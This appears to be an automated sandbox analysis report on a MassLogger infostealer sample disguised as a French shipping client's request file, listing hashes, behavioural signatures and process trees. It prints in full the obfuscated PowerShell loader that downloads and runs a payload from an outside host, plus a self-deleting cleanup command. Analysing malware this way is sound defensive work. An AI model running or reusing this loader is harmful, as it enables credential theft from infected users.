Analysis
-
max time kernel
152s -
max time network
132s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
31-07-2020 10:56
Static task
static1
Behavioral task
behavioral1
Sample
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
Resource
win10
General
-
Target
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
-
Size
19KB
-
MD5
36117a183609bb6953d3f78bb45ee5b9
-
SHA1
0d89d56bac5838a3f0854e43b42e564d290f4935
-
SHA256
3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1
-
SHA512
79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2
Malware Config
Extracted
C:\Users\Admin\AppData\Local\42EF15E83D\Log.txt
masslogger
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 752 992 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exeInstallUtil.exepowershell.exedescription pid process Token: SeDebugPrivilege 752 Powershell.exe Token: SeIncreaseQuotaPrivilege 752 Powershell.exe Token: SeSecurityPrivilege 752 Powershell.exe Token: SeTakeOwnershipPrivilege 752 Powershell.exe Token: SeLoadDriverPrivilege 752 Powershell.exe Token: SeSystemProfilePrivilege 752 Powershell.exe Token: SeSystemtimePrivilege 752 Powershell.exe Token: SeProfSingleProcessPrivilege 752 Powershell.exe Token: SeIncBasePriorityPrivilege 752 Powershell.exe Token: SeCreatePagefilePrivilege 752 Powershell.exe Token: SeBackupPrivilege 752 Powershell.exe Token: SeRestorePrivilege 752 Powershell.exe Token: SeShutdownPrivilege 752 Powershell.exe Token: SeDebugPrivilege 752 Powershell.exe Token: SeSystemEnvironmentPrivilege 752 Powershell.exe Token: SeRemoteShutdownPrivilege 752 Powershell.exe Token: SeUndockPrivilege 752 Powershell.exe Token: SeManageVolumePrivilege 752 Powershell.exe Token: 33 752 Powershell.exe Token: 34 752 Powershell.exe Token: 35 752 Powershell.exe Token: SeIncreaseQuotaPrivilege 752 Powershell.exe Token: SeSecurityPrivilege 752 Powershell.exe Token: SeTakeOwnershipPrivilege 752 Powershell.exe Token: SeLoadDriverPrivilege 752 Powershell.exe Token: SeSystemProfilePrivilege 752 Powershell.exe Token: SeSystemtimePrivilege 752 Powershell.exe Token: SeProfSingleProcessPrivilege 752 Powershell.exe Token: SeIncBasePriorityPrivilege 752 Powershell.exe Token: SeCreatePagefilePrivilege 752 Powershell.exe Token: SeBackupPrivilege 752 Powershell.exe Token: SeRestorePrivilege 752 Powershell.exe Token: SeShutdownPrivilege 752 Powershell.exe Token: SeDebugPrivilege 752 Powershell.exe Token: SeSystemEnvironmentPrivilege 752 Powershell.exe Token: SeRemoteShutdownPrivilege 752 Powershell.exe Token: SeUndockPrivilege 752 Powershell.exe Token: SeManageVolumePrivilege 752 Powershell.exe Token: 33 752 Powershell.exe Token: 34 752 Powershell.exe Token: 35 752 Powershell.exe Token: SeDebugPrivilege 1220 InstallUtil.exe Token: SeDebugPrivilege 1204 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
Powershell.exeInstallUtil.exepowershell.exepid process 752 Powershell.exe 752 Powershell.exe 1220 InstallUtil.exe 1204 powershell.exe 1204 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 5 752 Powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
Powershell.exeInstallUtil.execmd.exedescription pid process target process PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 752 wrote to memory of 1220 752 Powershell.exe InstallUtil.exe PID 1220 wrote to memory of 1976 1220 InstallUtil.exe cmd.exe PID 1220 wrote to memory of 1976 1220 InstallUtil.exe cmd.exe PID 1220 wrote to memory of 1976 1220 InstallUtil.exe cmd.exe PID 1220 wrote to memory of 1976 1220 InstallUtil.exe cmd.exe PID 1976 wrote to memory of 1204 1976 cmd.exe powershell.exe PID 1976 wrote to memory of 1204 1976 cmd.exe powershell.exe PID 1976 wrote to memory of 1204 1976 cmd.exe powershell.exe PID 1976 wrote to memory of 1204 1976 cmd.exe powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 752 set thread context of 1220 752 Powershell.exe InstallUtil.exe -
MassLogger log file 1 IoCs
Detects a log file produced by MassLogger.
Processes:
yara_rule masslogger_log_file -
Drops file in System32 directory 2 IoCs
Processes:
Powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 api.ipify.org -
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start /b powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
memory/1204-8-0x0000000000000000-mapping.dmp
-
memory/1204-9-0x0000000000000000-mapping.dmp
-
memory/1220-3-0x0000000000400000-0x000000000049A000-memory.dmpFilesize
616KB
-
memory/1220-4-0x000000000049424E-mapping.dmp
-
memory/1220-5-0x0000000000400000-0x000000000049A000-memory.dmpFilesize
616KB
-
memory/1220-6-0x0000000000400000-0x000000000049A000-memory.dmpFilesize
616KB
-
memory/1976-7-0x0000000000000000-mapping.dmp